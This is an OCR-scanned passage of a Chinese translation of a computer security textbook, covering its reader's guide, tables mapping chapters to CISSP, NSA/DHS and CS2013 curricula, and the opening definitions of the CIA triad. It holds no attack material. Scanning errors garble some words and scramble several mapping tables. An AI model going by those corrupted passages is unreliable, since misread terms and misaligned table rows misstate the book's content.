这 些 项 目 和 练习 出 发 ， 还 可 以 方便 地 根据 实际 情况 制定 不 同 的 教学 计划 ， 以 满足 不 同 教师 和 学 
生 的 特殊 需求 。 更 为 详细 的 内 容 请 参见 附录 A。 
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本 书 及 与 本 书 内 容 相关 的 Web 站 点 涵盖 了 很 多 学 习 资料 。 下 面 将 对 此 做 一 个 概括 性 的 
介绍 。 


0.1 本 书 概要 


第 0 章 主要 是 一 个 阅读 引导 ， 本 书 由 以 下 五 个 部 分 组 成 : 

第 一 部 分 (计算 机 安全 技术 与 原理 ) : 这 一 部 分 涵盖 了 建立 有 效 安 全 策略 所 涉及 的 技术 领 
域 。 第 2 章 列举 了 一 些 重要 的 密码 编码 算法 ， 讨 论 了 它们 的 使 用 及 强度 问题 。 其 余 的 章节 则 涉 
及 其 他 特定 的 计算 机 安全 技术 领域 : 认证 技术 、 访 问 控制 、 数 据 库 与 云 安 全 、 亚 意 软 件 、 拒 绝 
服务 、 入 侵 检 测 技 术 、 防 火 墙 技术 等 。 

第 二 部 分 (软件 安全 与 可 信 系统 ) : 这 一 部 分 主要 涉及 软件 开发 和 运行 所 带 来 的 安全 问题 ， 
这 些 软件 包括 操作 系统 、 实 用 软件 和 应 用 软件 。 第 10 章 涉及 的 内 容 是 长 期 存在 的 缓冲 区 溢出 
问题 ， 而 第 11 章 则 分 析 了 软件 一 些 其 他 的 安全 问题 。 第 12 章 对 操作 系统 安全 进行 了 概览 。 这 
部 分 的 最 后 一 章 主 要 解决 可 信 计 算 和 多 层 安 全 问题 ， 其 中 涉及 软件 和 硬件 两 个 方面 。 

第 三 部 分 (管理 问题 ) : 这 一 部 分 主要 涉及 信息 与 计算 机 安全 在 管理 方面 的 问题 。 第 14 章 
和 第 15 章 着 力 于 与 风险 评估 、 安 全 控制 措施 的 设置 、 管 理 计算 机 安全 的 计划 和 规程 等 相关 的 
管理 实践 。 第 16 章 专 注 于 实现 物理 安全 的 方法 ， 其 是 对 第 一 部 分 用 技术 方法 实现 安全 的 必要 
补充 。 第 17 章 分 析 了 与 计算 机 安全 相关 的 各 种 人 为 因素 。 计 算 机 安全 中 一 个 重要 的 管理 工具 
是 安全 审计 ， 安 全 审计 将 在 第 18 章 中 涉及 。 最 后 ， 在 第 19 章 中 探讨 了 与 计算 机 安全 有 关 的 法 
律 与 道德 方面 的 内 容 。 

第 四 部 分 (密码 编码 算法 ) : 许多 支持 计算 机 安全 的 技术 措施 ， 主 要 依靠 的 是 各 种 类 型 的 
加 密 和 密码 编码 算法 。 第 四 部 分 对 这 些 算法 的 技术 层面 进行 了 概述 。 

第 五 部 分 ( 网络 安 全 ) : 这 一 部 分 关注 的 是 为 在 Intenet 上 进行 通信 提供 安全 保障 的 协议 和 
标准 。 第 22 章 讨 论 了 在 Internet 上 使 用 的 一 些 最 为 重要 的 安全 协议 。 第 23 章 涉 及 与 Internet 
认证 相关 的 各 种 标准 和 协议 。 第 24 章 涉及 无 线 网 络 安全 方面 的 重要 内 容 。 


0.2 读者 与 教师 阅读 指南 


本 书 涵盖 了 很 多 内 容 。 如 果 读 者 或 者 教师 想 快速 地 学 习 本 书 的 内 容 ， 可 有 多 种 方案 选择 。 

全 面 地 掌握 前 两 个 部 分 的 内 容 ， 需 要 按 章节 的 顺序 仔细 阅读 学 习 。 如 果 想 对 第 一 部 分 快速 
学 习 ， 可 以 选择 跳 过 第 5 章 (数据 库 安全 )。 

虽然 第 二 部 分 涉及 的 是 软件 安全 方面 的 内 容 ， 但 用 户 和 系统 开发 人 员 也 会 对 这 部 分 内 容 很 
感 兴趣 。 其 实 ， 这 部 分 内 容 与 系统 开发 人 员 更 为 直接 相关 。 对 第 13 章 (可 信 计 算 与 多 级 安全 ) 
可 以 进行 有 选择 的 阅读 。 

第 三 部 分 中 ,除了 第 14 章 (IT 安全 管理 与 风险 评估 ) 和 第 15 章 (IT 安全 控制 措施 、 计 划 
和 规程 ) 以 外 ， 其 他 章节 的 内 容 都 相对 独立 。 可 以 独立 地 学 习 这 些 章节 ， 也 可 以 有 选择 地 选 一 
些 章节 学 习 。 
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第 四 部 分 提供 了 密码 算法 详细 的 技术 细节 ， 供 有 兴趣 的 读者 学 习 。 
第 五 部 分 涉及 Internet 安全 ， 读 者 可 以 在 学 习 完 第 一 部 分 之 后 随时 学 习 这 一 部 分 内 容 。 


0.3 支持 CISSP 认证 


本 书 覆 盖 了 CISSP (注册 信息 系统 安全 师 ) 认证 规定 的 所 有 科目 领域 。 

由 于 现在 的 雇主 趋向 于 依靠 内 部 员工 去 管理 和 开发 安全 策略 、 安 全 技术 ， 并 评估 、 管 理 外 
部 的 安全 服务 和 产品 ， 因 而 有 了 对 评估 方法 的 需求 。 逐 渐 地 ， 和 雇主 倾向 于 将 认证 资格 证 书 视 为 
考察 应 聘 者 是 否 具 有 安全 领域 所 需 知识 与 技能 的 重要 依据 。 

国际 标准 ISO/EC 17024 (人 员 认 证 机 构 通用 要 求 ，General Requirements for Bodies Operating 
Certification of Persons) 定义 了 与 认证 相关 的 术语 : 

© 认证 过 程 ， 由 认证 机 构 制定 的 、 用 于 确定 一 个 人 是 否 满足 规定 的 技能 要 求 的 所 有 活动 。 

e 认证 方案 : 与 特定 类 型 的 人 员 相关 的 规定 的 认证 要 求 ， 一 般 基 于 相同 的 特定 的 标准 与 

规则 ， 以 及 相同 的 实施 过 程 。 
e 技能 : 所 展现 出 的 应 用 知识 和 (或 ) 技巧 的 能 力 (只 要 是 相关 的 )， 以 及 所 展现 出 的 个 
人 品质 。 这 些 通常 是 在 认证 方案 中 明确 过 的 。 

国际 信息 系统 安全 认证 协会 (ISC) “是 一 个 非 营 利 性 的 机 构 ， 它 所 设立 的 CISSP 认证 被 
认为 是 信息 安全 领域 认证 中 的 “黄金 准则 ”。CISSP 认证 是 安全 产业 唯一 的 被 广泛 认可 的 认证 
[SAVA03]。 包 括 美国 国防 部 和 许多 金融 机 构 在 内 的 许多 组 织 ， 时 下 都 要 求 其 网 络 安全 部 门 的 
人 员 具 有 CISSP 认证 [DENN11]。2004 Æ, CISSP 成 为 首 个 获取 ISO/IEC 17024 官方 认可 的 信 
息 技术 项 目 。 

CISSP 考试 基于 公共 知识 体系 (Common Body of Knowledge，CBK)， 信 息 安全 最 好 的 训 
练 大 纲 由 国际 信息 系统 安全 认证 协会 (ISC) :开发 和 维护 。CBK 由 10 个 知识 域 构成 ， 它 们 构 
成 了 CISSP 认证 所 要 求 的 知识 体系 。 表 0-1 列 出 了 CISSP 知识 体系 中 包含 的 内 容 及 本 书 相 关 
的 章节 。 


表 0-1 CISSP 覆盖 的 领域 











CISSP 领域 知识 域 中 的 关键 主题 本 书 涉及 的 内 容 
。 识别 、 认 证 和 授权 技术 
l 。 自主 访问 控制 与 强制 访问 控制 模型 
访问 控制 。 基于 规则 的 访问 控制 与 基于 角色 的 访问 | 4 访问 控制 
控制 
。 软件 开发 模型 5 一 数据 库 安全 
应 用 开发 安全 。 数据 库 模型 10 一 缓冲 区 溢出 
。 关系 数据 库 组 件 11 一 软件 安全 
。 计划 
| | 。 角色 和 义务 16 一 物理 和 基础 设施 安全 
业务 持续 性 和 灾难 恢复 计划 。 | 。 责任 和 值得 关注 的 问题 17 “人力 资源 安全 
。 业务 影响 分 析 
。 分 组 密码 和 流 密码 2 一 密码 编码 工具 
密码 学 。 对 称 密码 的 解释 和 使 用 20 一 对 称 密码 和 消息 机 密 性 
。 非 对 称 密码 的 解释 和 使 用 21 一 公 铀 加 密 和 消息 认证 
。 安全 控制 类 型 l 
信息 安全 治理 和 风险 管理 。 |o 安全 策略 、 标 准 、 过 程 和 指导 方针 14 IT 安全 管理 和 风险 评估 


e 风险 管理 和 分 析 15 一 一 IT 安全 控制 、 计 划 和 规程 
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(28) 
CISSP 领域 知识 域 中 的 关键 主题 本 书 涉 及 的 内 容 
© 隐私 保护 法 及 相关 问题 
法 律 、 法 规 、 调 查 和 合 规 e 计算 机 犯罪 调查 19 一 一 法 律 和 道德 方面 
o 证 据 的 类 型 
© 操作 部 门 义务 15 一 一 IT 安全 控制 、 计 划 和 规程 
操作 安全 e 人 员 和 角色 17 一 一 人 力 资源 安全 
e 媒体 库 和 资源 保护 18 一 一 安全 审计 
© 设备 选 址 和 建设 问题 
物理 (环境 ) 安全 e 物理 脆弱 性 和 威胁 16 一 一 物理 和 基础 设施 安全 
o 边界 保护 
e 关键 部 件 
安全 架构 与 设计 e 访问 控制 模型 13 一 一 可 信 计 算 和 多 级 安全 
o 证 书 和 认证 
© TCP/IP 协议 族 附录 F 一 一 TCP/IP 协议 架构 
电信 和 网 络 安全 © LAN, MAN 和 WAN 技术 22——Internet 安全 协议 和 标准 
© 防火 墙 类 型 和 架构 24 一 一 无 线 网 络 安全 


以 下 是 CISSP 认证 知识 体系 中 的 10 个 知识 域 ， 

e 访问 控制 : 为 保护 信息 系统 资产 安全 而 创建 的 一 个 安全 架构 ， 该 安全 架构 是 由 一 系列 
安全 机 制 的 协同 工作 实现 的 。 

应 用 开发 安全 : 强调 应 用 软件 开发 所 运用 的 重要 安全 概念 。 这 个 概念 概述 了 软件 设计 
和 开发 的 环境 ， 并 阐述 了 软件 在 保证 信息 系统 安全 中 至 关 重要 的 地 位 。 

业务 持续 性 和 灾难 恢复 计划 : 目标 是 在 事件 中 断 中 保持 和 恢复 业务 运行 。 

密码 学 : 为 保证 信息 的 完整 性 、 机 密 性 和 真实 性 而 采取 的 信息 伪装 技术 的 原理 、 工 具 
和 方法 。 

信息 安全 治理 和 风险 管理 : 由 组 织 信息 资产 的 识别 ， 以 及 安全 策略 、 标 准 、 过 程 和 指 
导 方 针 的 开发 、 文 件 编制 和 实施 执行 组 成 。 管 理工 具 ， 如 数据 分 类 和 风险 评估 /分析 
等 ， 用 于 识别 威胁 、 分 类 资产 ， 以 及 对 系统 缺陷 分 级 ， 以 达到 有 效 的 安全 控制 。 

法 律 、 法 规 、 调 查 和 合 规 : 计算 机 犯罪 的 相关 法 律 、 法 规 的 类 型 。 相 关 的 方法 和 技术 
用 于 调查 计算 机 犯罪 事件 。 

操作 安全 : 操作 安全 用 于 对 硬件 、 媒 体 等 资源 以 及 对 这 些 资 源 具 有 权限 的 操作 者 和 管 
理 员 控制 的 识别 。 审 计 和 监视 是 相应 的 安全 机 制 、 工 具 和 设备 ， 用 于 识别 安全 事件 和 
识别 关键 因素 的 后 续 动作 并 将 相关 信息 报告 给 相关 个 人 、 群 组 或 过 程 。 

物理 安全 (环境 安全 ) : 从 外 部 边界 到 内 部 工作 空间 ， 为 全 部 设备 提供 保护 技术 , 包括 
对 所 有 的 信息 系统 资源 的 保护 。 

安全 架构 与 设计 : 包括 关于 设计 的 概念 、 原 理 、 结 构 和 标准 ， 监 视 设备 、 安 全 的 操作 
系统 、 设 备 、 网 络 、 应 用 ， 以 及 用 于 实现 各 个 级 别 的 可 用 性 、 完 整 性 和 机 密 性 的 控制 。 
电信 和 网 络 安 全 : 包括 网 络 体系 结构 ， 传 送 方法 和 传输 格式 ; 用 来 保证 可 用 性 、 完 整 
性 和 机 密 性 的 安全 措施 ; 以 及 对 在 私有 和 公有 环境 下 通信 网 络 的 传输 和 媒介 的 认证 。 
本 书 中 ， 我 们 将 以 一 定 的 深度 来 讨论 这 些 知识 域 。 


0.4 支持 NSA/DHS 认证 
美国 国家 安全 局 (NSA) 和 美国 国土 安全 部 (DHS) 联合 创建 了 信息 保障 /网 络 防御 国 
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家 卓越 学 术 中 心 ( The National Centers of Academic Excellence in Information Assurance/Cyber 
Defense, IA/CD) 项 目 。 创 建 这 些 项 目的 目的 是 ， 通 过 促进 IA 领域 高 等 教育 和 科研 的 发 展 ， 
培养 一 批 各 个 学 科 中 具有 IA 专门 知识 的 专业 人 员 ， 以 尽量 减少 本 国信 息 基础 设施 存在 的 缺陷 。 
为 了 达到 这 个 目标 ， 美 国 国家 安全 局 / 国土 安全 部 为 一 些 两 年 制 和 四 年 制 的 机 构 定义 了 一 组 知 
识 单元 ， 这 些 知识 单元 必须 包含 在 课程 体系 中 ， 这 样 可 以 将 它们 纳入 IA/CD 中 的 NSA/DHS 的 
国家 卓越 学 术 中 心 项 目 。 每 一 个 知识 单元 都 由 最 基本 的 一 些 主题 及 一 个 或 多 个 学 习 目 标 构成 。 
是 否 纳入 取决 于 其 是 否 具 有 一 定数 量 的 核心 和 可 选 知识 单元 。 
在 计算 机 安全 领域 ，2014 年 的 知识 单元 (Knowledge Unit) 文件 [NCAE13] 列举 了 以 下 核 
心 单元 : 
e 网 络 防御 : 包括 访问 控制 、 密 码 学 、 防 火 墙 、 入 侵 检测 系统 、 恶 意 活动 检测 及 其 应 对 
措施 、 信 任 关 系 和 深度 防御 等 。 
e 网 络 威胁 : 包括 攻击 类 型 、 法 律 问题 、 攻 击 面 、 攻 击 树 、 内 部 人 员 问 题 、 威 胁 信息 
源 等 。 
e 基本 安全 设计 原则 : 一 共 包含 12 条 原则 ， 这 些 原则 将 在 本 书 的 1.4 节 中 阐述 。 
e 信息 保障 基本 原理 : 包括 威胁 与 脆弱 性 、 人 侵 检 测 与 防御 系统 、 密 码 学 、 访 问 控制 模 
型 、 识 别 /认证 、 审 计 等 。 
© 密码 学 导论 : 包括 对 称 密码 学 、 公 和 钥 密 码 学 、 散 列 函 数 、 数 字 签 名 等 。 
e 数据 库 : 包括 数据 库 概 述 、 数 据 库 访 问 控制 、 推 理 的 安全 问题 。 
本 书 广 泛 地 涵盖 了 以 上 这 些 领域 。 此 外 ， 本 书 还 会 涉及 部 分 可 选 知识 单元 。 


0.5 支持 ACM/IEEE 计算 机 协会 计算 机 科学 课程 2013 


计算 机 科学 课程 2013 (CS2013 ) 是 美国 计算 机 协会 (ACM) 和 国际 电气 与 电子 工程 师 
学 会 的 计算 机 学 会 (IEEE-CS) 共同 设立 的 课程 。ACM 和 IEEE-CS 以 课程 68 的 公布 作为 开 
端 ， 共 同 推动 计算 机 科学 课程 的 发 展 。CS2013 是 自 2001 年 以 来 第 一 个 被 推荐 的 全 面 修订 的 版 
本 。 数 以 百 计 的 计算 机 科学 领域 的 教授 、 系 主任 、 全 世界 范围 内 的 本 科 生 学 习 指导 教师 都 为 
CS2013 的 研发 做 出 了 贡献 。 随 之 产生 了 广泛 的 共识 : 增加 一 个 新 的 知识 领域 一 一 信息 保障 与 
安全 (Information Assurance and Security, IAS). 

IAS 作为 一 个 知识 域 由 一 系列 的 控制 和 过 程 组 成 ， 同 时 包含 技术 和 策略 ， 旨 在 保护 信息 和 
信息 系统 的 可 用 性 、 完 整 性 、 认 证 性 、 机 密 性 和 不 可 否认 性 。 保 障 的 概念 包含 了 当前 与 过 去 都 
要 保证 进程 和 数据 的 有 效 性 的 含义 。 保 障 和 安全 的 概念 则 提供 了 一 个 完全 的 安全 观点 。 

CS2013 将 所 有 需要 讲授 的 课程 内 容 分 为 三 类 : 核心 1 级 (Core-Tier 1) (所 有 的 主题 都 应 
被 包含 在 课程 体系 中 )， 核 心 2 级 (Core-Tier 2 ) (全 部 或 大 部 分 主题 应 当 被 包含 在 课程 体系 中 )， 
选修 内 容 (合适 的 具有 一 定 广 度 和 深度 的 选修 主题 )。 在 IAS 领域 中 ，CS2013 包含 了 3 个 核心 
1 级 的 主题 、5 个 核心 2 级 的 主题 和 许多 选修 主题 ， 且 每 一 个 主题 都 包含 一 些 子 主题 。 本 书包 
E T CS2013 的 核心 1 级 和 核心 2 级 的 全 部 内 容 ， 同 时 也 包含 了 CS2013 的 许多 选修 主题 。 表 
0-2 列 出 了 本 书包 含 的 关于 IAS 知识 领域 的 内 容 。 





表 0-2 本 书包 含 的 CS2013 IAS 知识 领域 的 内 容 









IAS 知识 单元 本 书 覆盖 情况 









© CIA (机 密 性 、 完 整 性 和 可 用 性 ) 
e 风险 、 威 胁 、 脆 弱点 和 攻击 向 量 
e 认证 与 授权 ， 访 问 控制 (强制 的 与 自主 的 ) 
© 信任 和 可 信和 度 

。 道德 (责任 公开 ) 








1 一 一 综述 
3 一 一 用 户 认证 
4 一 一 访问 控制 
19 一 一 法 律 和 道德 因素 


安全 的 基本 概念 ( 1 级 ) 
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( 续 ) 


nS RAT ET 


o 最 小 特权 和 隔离 
© 安全 默认 设置 
e 开放 式 设 计 


安全 设计 原则 ( 1 级 ) © 端 到 端 安全 1 一 一 综述 
e 深度 防御 
© 设计 安全 
o 安全 和 其 他 设计 目标 的 权衡 


e 绝对 中 介 

© 被 审核 的 安全 组 件 的 使 用 

© 经 济 机 制 (减少 可 信 计 算 基础 ， 最 小 化 攻击 面 ) 
e 可 用 安全 

© 安全 组 合 性 

e 防御 、 检 测 和 威慑 


e 输入 检验 和 数据 清洗 

e 选择 编程 语言 和 类 型 安全 语言 

© 输入 检验 和 数据 清洗 错误 案例 (缓冲 区 溢出 、 整 
数 错 误 、SQL 注入 和 XSS 漏洞 ) 

© 竞 态 条 件 

© 正确 处 理 异 常 和 非 预期 行为 


。 第 三 方 组 件 的 正确 使 用 11 一 软件 安全 
eee [2m 。 有 效 进行 安全 更 新 12 一 操作 系统 安全 


o 攻击 者 的 目标 、 能 力 和 动机 

e 恶意 软件 6 一 一 恶意 软件 

© 拒绝 服务 和 分 布 式 拒绝 服务 7 一 一 拒绝 服务 攻击 
e 社会 工程 学 


© 网 络 特定 威胁 和 攻击 类 型 
© 使 用 密码 学 保证 数据 和 网 络 安全 8 一 一 人 侵 检测 
网 络 安全 ( 2 级 ) o 安全 网 络 架构 9 一 一 防火 墙 与 人 侵 防 御 系 统 
© 防御 机 制 和 对 策 第 五 部 分 一 一 网 络 安全 
© 无 线 网 络 、 蜂 窝 式 网 络 安全 


© 基本 密码 学 术语 

e 密码 种 类 2 一 一 密码 编码 工具 

o 数学 基础 概述 第 四 部 分 一 一 密码 编码 算法 
© 公 钥 密码 基础 设施 





安全 设计 原则 ( 2 级 ) 





防御 性 编程 ( 1 级 ) 11 一 一 软件 安全 





威胁 和 攻击 ( 2 级 ) 








密码 学 (2 级 ) 





0.6 Internet 和 Web 资源 
在 Internet 和 本 书 网 站 上 有 许多 可 用 的 资源 ， 这 些 资源 反映 了 计算 机 安全 技术 的 发 展 。 


0.6.1 本 书 的 支持 网 站 


我 们 为 本 书 维护 的 配套 Web 站 点 是 ，WilliamStalling.com/ComputerSecurity。 对 于 学 生 而 
言 ， 这 个 Web 站 点 包含 了 很 多 相关 链接 ， 按 照章 节 分 类 组 织 ， 并 列 出 了 本 书 的 勘误 表 。 对 
于 教师 而 言 ， 这 个 网 站 提供 了 一 些 链接 ， 这 些 链 接 是 一 些 使 用 本 书 作 为 教材 的 教授 的 教学 资 
料 网 页 。 

我 们 还 提供 了 一 个 具有 访问 权限 限制 的 高 级 内 容 (Premium Content) Web 站 点 ， 这 个 站 点 
提供 了 丰富 的 辅助 材料 ， 包 括 附 加 的 在 线 章节 、 附 加 的 在 线 附录 ， 以 及 一 系列 带 有 参考 答案 的 
课 后 习题 。 
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针对 本 书 还 为 教师 提供 了 一 些 附加 资料 ， 包 括 问题 解决 方案 手册 和 项 目 手 册 ， 这 些 内 容 可 
以 在 本 书 的 教师 资源 中 心 (Instructor Resource Center, IRC) 获得 。 本 书 前 言 部 分 有 相关 的 详细 
信息 。 


06.2 ”计算 机 科学 学 生 资源 网 站 


William Stallings 也 维护 了 一 个 计算 机 科学 学 生 资 源 网 站 ， 网 址 为 ComputerScience- 
Student.com。 这 个 网 站 的 目的 是 为 学 习 计算 机 科学 的 学 生 和 专业 技术 人 员 提 供 文 档 、 信 息 和 链 
接 。 链 接 和 文档 分 为 5 类 : 

o 数学 (Math) : 包含 基础 数学 补习 资料 、 排 队 分 析 入 门 读物 、 数 字 系 统 人 门 读 物 和 大 量 
数学 站 点 的 链接 。 
指南 (How-to): 关于 解答 课 后 习题 、 书 写 技术 报告 和 准备 技术 汇报 的 建议 和 指导 。 
研究 资源 (Research resources): 重要 论文 集 、 技 术 报告 和 参考 文献 的 链接 。 
其 他 (Other useful): 其 他 各 种 有 用 的 文档 和 链接 。 
计算 机 科学 行业 (Computer science careers): 为 计划 在 计算 机 科学 领域 发 展 的 人 士 提供 
一 些 有 益 的 链接 和 文献 。 


0.6.3 ”其 他 Web 站 点 


有 大 量 的 Web 站 点 提供 了 与 本 书 主题 相关 的 信息 ， 本 书 配套 的 Web 站 点 提供 了 按 章节 分 
类 和 组 织 的 这 些 信息 的 网 址 链接 。 

有 一 些 在 计算 机 安全 方面 有 价值 的 网 络 论坛 ， 本 书 配套 的 Web 站 点 提供 了 按 章节 分 类 和 
组 织 的 这 些 网 络 论坛 的 网 址 链接 。 


0.7 标准 

本 书 中 所 描述 的 许多 安全 技术 和 应 用 已 经 被 认定 为 标准 。 另 外 ， 这 些 标准 已 经 被 大 为 拓展 
了 ,目前 涵盖 管理 实践 和 整个 安全 机 制 与 服务 体系 。 在 本 书 中 ,我 们 利用 正在 使 用 的 最 重要 的 
或 正在 开发 的 标准 来 描述 计算 机 安全 的 各 个 方面 。 各 种 组 织 都 在 致力 于 促进 或 推动 这 些 标准 的 
发 展 。 一 些 最 重要 (截止 到 当前 的 版 本 ) 的 组 织 如 下 : 

e 美国 国家 标准 与 技术 研究 所 ( National Institute of Standard and Technology): NIST 
是 美国 联邦 政府 的 一 个 机 构 ， 负 责 制定 美国 政府 使 用 的 度量 、 标 准 和 技术 规范 ， 也 
负责 推动 美国 私营 企业 的 创新 。 尽 管 是 一 个 美国 国家 机 构 ，NIST 联邦 信息 处 理 标准 
(NIST Federal Information Processing Standards, FIPS) 与 Special Publications ( SP) 
有 着 国际 范围 的 影响 力 。 
Internet 协会 ( Internet Society): ISOC 是 一 个 专业 的 成 员 联盟 ， 其 拥有 世界 性 的 组 织 
成 员 和 个 人 成 员 。 在 诸如 Internet 的 未 来 等 前 沿 问题 上 ， 它 处 于 领导 者 的 地 位 。 同 时 ， 
它 也 是 制定 各 种 Internet 基础 设施 标准 组 织 的 管理 机 构 。 这 些 组 织 包括 : Internet 工程 
任务 组 (Internet Engineering Task Force, IETF) 和 Internet 体系 结构 委员 会 ( Internet 
Architecture Board，IAB)。 这 些 组 织 制定 Internet 标准 和 相关 细节 。 所 有 的 标准 都 以 请 
求 评 论 (Requests for Comments, RFC) 的 形式 公布 。 
ITU 电信 标准 化 部 门 (ITU-T): Internet 电 子 通 信 联 盟 (Internet Telecommunication 
Union, ITU) 是 联合 国 系统 中 的 一 个 国际 性 组 织 ， 各 国政 府 和 私营 企业 在 它 的 领导 
下 一 起 协调 全 球 的 电子 通信 网 络 和 服务 。ITU 的 电信 标准 化 部 门 (Telecommunication 
standardization sector, ITU-T) Æ ITU 的 三 大 部 门 之 一 。ITU-T 的 任务 是 制定 覆盖 所 有 
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电子 通信 和 领域 的 标准 。ITU-T 的 标准 被 称 为 推荐 标准 (Recommendation), co] 
e 国际 标准 化 组 织 (ISO): 国际 标准 化 组 织 (ISO) 9 是 一 个 由 全 球 140 多 个 国家 的 国家 
标准 组 织 参加 的 世界 联盟 。ISO 是 一 个 非 政 府 组 织 ， 它 负责 推动 标准 化 的 发 展 ， 促 进 
国际 商品 和 服务 交换 ， 发 展 全 球 在 智力 、 科 学 、 技 术 和 经 济 活动 方面 的 合作 。ISO 促 
使 国际 协议 变 成 国际 标准 。 
有 关 这 些 组 织 的 更 加 详细 的 信息 包含 在 附录 C 中 。 


日 ”ISO 不 是 一 个 缩 略 词 (假如 是 缩 略 词 就 应 该 写 为 IOS)， 而 是 一 个 词 ， 它 来 自 希 腊 语 ， 是 相等 ( equal) 


的 意思 。 


第 1 章 | 


Computer Security: Principles and Practice, Third Edition 


wm 述 





学 习 目标 

学 习 完 本 章 之 后 ， 你 应 当 能 够 : 

© 描述 有 关机 密 性 、 完 整 性 和 可 用 性 的 关键 安全 要 求 ; 

© 讨论 亟待 解决 的 安全 威胁 、 安 全 攻击 的 类 型 ， 给 出 不 同类 型 计算 机 和 网 络 资产 面临 这 几 


类 威胁 和 攻击 的 例子 ，; 

概述 计算 机 安全 的 基本 要 求 ; 
解释 基本 安全 设计 原则 ; 

讨论 攻击 面 和 攻击 树 的 用 途 ; 
理解 全 面 安全 策略 的 主要 方面 。 


本 章 概述 计算 机 安全 的 基本 概念 。 首 先 ， 讨 论 计算 机 安全 的 定义 。 本 质 上 ,计算机 安全 讨 
论 的 是 那些 与 计算 机 相关 的 容易 遭受 各 种 威胁 的 资产 ， 以 及 保护 这 些 遭 受 威胁 的 资产 所 采取 的 
各 种 措施 。1.2 节 给 出 用 户 和 系统 管理 者 希望 保护 的 计算 机 相关 资产 的 分 类 ， 并 研究 这 些 资产 
所 面临 的 各 种 威胁 和 攻击 。 从 1.3 ~ 1.5 节 ， 我 们 从 三 个 不 同 的 观点 分 析 了 应 对 这 些 威胁 和 攻 
击 的 措施 。1.6 节 列 举 了 一 些 计算 机 安全 的 策略 。 

本 章 主 要 关注 (这 实际 上 也 是 本 书 所 关注 的 ) 如 下 三 个 基本 问题 : 

1. 我 们 需要 保护 什么 样 的 资产 ? 

2. 这 些 资产 是 如 何 受到 威胁 的 ? 

3. 我 们 可 以 做 些 什么 来 应 对 这 些 威胁 ? 


11 计算 机 安全 的 概念 


1.1.1 计算 机 安全 的 定义 
NIST 计算 机 安全 手册 [NIST95] 对 计算 机 安全 (computer security) 的 定义 如 下 : 





计算 机 安全 : 为 自动 化 信息 系统 提供 的 保护 ， 目 标 是 保持 信息 系统 资源 (包括 硬件 、 软 件 、 





固件 、 信 息 /数据 和 电信 ) 的 完整 性 、 可 用 性 和 机 密 性 。 


这 个 定义 包括 处 于 计算 机 安全 核心 地 位 的 三 个 关键 目标 ; 
© 机 密 性 (confidentiality): 这 个 术语 包含 两 个 相关 概念 : 
n 数据 机 密 性 6， 确保 隐私 或 机 密 信息 不 被 非 授权 的 个 人 利用 ， 或 被 泄露 给 非 授权 的 
个 人 。 
n 隐私 性 : 确保 个 人 能 够 控制 或 影响 与 自身 相关 的 信息 的 收集 和 存储 ， 也 能 够 控制 这 


© RFC 4949 定义 信息 为 “能 够 用 多 种 数据 形式 表现 (编码 ) 的 事实 或 想法 ”; 定义 数据 为 “信息 的 一 种 特定 的 


物理 表示 ， 通常 是 一 个 有 意义 的 符号 序列 ; 特别 指 可 以 由 计算 机 处 理 或 产生 的 信息 的 表示 ”。 安 全 文献 中 通 
常 对 两 者 没有 进行 区 分 ， 本 书 中 也 没有 。 


Bie BH # 9 


些 信 息 可 以 由 谁 披露 或 向 谁 披露 。 
© 完整 性 (integrity): 这 个 术语 包含 两 个 相关 概念 : 
e 数据 完整 性 : 确保 信息 和 程序 只 能 在 指定 的 和 被 授权 的 情况 下 才能 够 被 改变 。 
系统 完整 性 : 确保 系统 在 未 受 损 的 方式 下 执行 预期 的 功能 ， 避 人 免 对 系统 进行 有 意 或 
无 意 的 非 授权 操作 。 
e 可 用 性 (availability): 确保 系统 能 够 及 时 响应 ， 并 且 不 能 拒绝 授权 用 户 的 服务 请 求 。 
这 三 个 概念 形成 了 经 常 提 到 的 CIA 三 元 组 ( CIA triad)。 这 三 个 概念 具体 体现 了 对 数据 和 
信息 的 基本 安全 目标 和 计算 服务 。 例 如 ，NIST 标准 FIPS 199 (联邦 信息 和 信息 系统 安全 分 类 
标准 ) 将 机 密 性 、 完 整 性 和 可 用 性 列 为 信息 和 信息 系统 的 三 个 安全 目标 。FIPS 199 从 需求 的 角 
度 对 这 三 个 目标 给 出 了 非常 有 用 的 描述 ， 并 在 每 个 分 类 中 提出 了 安全 缺失 的 定义 。 
e 机 密 性 : 保持 对 信息 访问 和 披露 的 限制 ， 包 括 对 个 人 隐私 和 专 有 信息 保护 的 措施 。 机 
密 性 缺失 是 指 非 授权 的 信息 披露 。 
e 完整 性 : 防范 不 正当 的 信息 修改 和 破坏 ， 包 括 保证 信息 的 抗 抵赖 性 和 真实 性 。 完 整 性 
缺失 是 指 非 授 权 的 信息 修改 或 破坏 。  . 
e WATE: 确保 及 时 可 靠 地 访问 和 使 用 信息 。 可 用 性 缺失 是 指 对 信息 或 信息 系统 的 访问 
和 使 用 的 破坏 。 
尽管 早已 确定 使 用 CIA 三 元 组 来 定义 安全 目标 ， 但 是 在 安全 领域 中 ， 一 些 人 仍 认 为 需要 
使 用 另外 的 概念 来 对 计算 机 安全 进行 全 面 的 描述 。 下 面 是 两 个 最 经 常 被 提 到 的 概念 : 
e 真实 性 (authenticity) : 真实 性 是 一 种 能 够 被 验证 和 信任 的 表示 真实 情况 或 正确 程度 的 
属性 ， 它 使 得 传输 、 消 息 和 消息 源 的 有 效 性 能 够 被 充分 相信 。 这 就 意味 着 要 验证 用 户 
的 身份 是 否 与 其 所 声称 的 一 致 ， 并 需要 保证 到 达 系 统 的 每 一 个 输入 都 是 来 自 可 信 的 信 
息 源 。 
e 可 说 明 性 (accountability): 安全 目标 要 求实 体 的 动作 能 够 被 唯一 地 追踪 。 这 需要 支持 
抗 抵赖 (non-repudiation)、 壁 人 又 (deterrence), RRA. 、 人 侵 检 测 和 防护 ， 以 及 事后 
恢复 和 诉讼 (legal action)。 由 于 真正 安全 的 系统 目前 还 是 不 能 达到 的 目标 ， 因 此 ,我 
们 必须 能 够 通过 追踪 来 找到 违反 安全 要 求 的 责任 人 。 系 统 能 够 保留 他 们 的 活动 记录 ， 
允许 事后 的 取证 分 析 用 以 跟踪 安全 违规 或 者 为 处 理 纠纷 提供 帮助 。 
注意 ，FIPS 199 将 真实 性 包含 在 完整 性 之 中 。 


1.1.2 ”实例 


下 面 提供 一 些 应 用 实例 来 说 明 刚才 所 列举 的 安全 要 求 9S。 针 对 这 些 例子 ， 我 们 将 存在 安全 
